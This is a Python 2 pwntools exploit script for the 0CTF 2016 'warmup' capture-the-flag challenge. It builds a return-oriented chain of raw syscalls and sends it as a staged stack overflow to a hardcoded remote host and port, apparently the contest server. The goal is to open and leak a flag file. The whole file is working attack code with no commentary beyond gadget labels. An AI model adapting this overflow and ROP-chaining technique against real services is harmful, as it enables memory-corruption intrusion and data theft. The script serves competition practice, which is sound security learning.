2016-03-12-0ctf/warmup/exploit.py

#!/usr/bin/python2

from cStringIO import StringIO
from pwn import *


def attack(connection):
    pathname = "/home/warmup/flag\x00"

    buffer = StringIO()
    buffer.write(p32(0x0804811d))                               # sys_read
    buffer.write(p32(0x080481b8))                               # add esp, 0x30 ; ret
    buffer.write(p32(0))                                        # fd
    buffer.write(p32(0x08049000))                               # buffer
    buffer.write(p32(len(pathname)))                            # size
    buffer.write("A" * 0x24)
    buffer.write(p32(0x08048135))                               # sys_write
    buffer.write(p32(0x080481b8))                               # add esp, 0x30 ; ret
    buffer.write(p32(1))                                        # fd
    buffer.write(p32(0x08049000))                               # buffer
    buffer.write(p32(constants.linux.i386.SYS_open))            # size
    buffer.write("A" * 0x24)
    buffer.write(p32(0x08048122))                               # syscall
    buffer.write(p32(0x080481b8))                               # add esp, 0x30 ; ret
    buffer.write(p32(0x08049000))                               # pathname
    buffer.write(p32(constants.linux.O_RDONLY))                 # flags
    buffer.write(p32(0))
    buffer.write("A" * 0x24)
    buffer.write(p32(0x0804811d))                               # sys_read
    buffer.write(p32(0x080481b8))                               # add esp, 0x30 ; ret
    buffer.write(p32(3))                                        # fd
    buffer.write(p32(0x08049000))                               # buffer
    buffer.write(p32(0x100))                                    # size
    buffer.write("A" * 0x24)
    buffer.write(p32(0x08048135))                               # sys_write
    buffer.write(p32(0x0804814d))                               # sys_exit
    buffer.write(p32(1))                                        # fd
    buffer.write(p32(0x08049000))                               # buffer
    buffer.write(p32(0x100))                                    # size
    exploit = buffer.getvalue()

    for offset in reversed(range(4, len(exploit), 0x10)):
        connection.recvuntil("Welcome to 0CTF 2016!\n")

        buffer = StringIO()
        buffer.write("A" * 0x20)
        if offset == 4:
            buffer.write(exploit[: offset + 0x10])
        else:
            buffer.write(p32(0x080480d8))                       # start
            buffer.write(exploit[offset: offset + 0x10])
        padding = 0x34 - buffer.tell()
        buffer.write("B" * padding)
        connection.send(buffer.getvalue())

    connection.send(pathname)

    leak = connection.recvall()
    print leak.encode("string_escape")


context.log_level = "debug"
with remote("202.120.7.207", 52608) as connection:
#ith process(["strace", "-i", "-o", "log", "./warmup"]) as connection:
    attack(connection)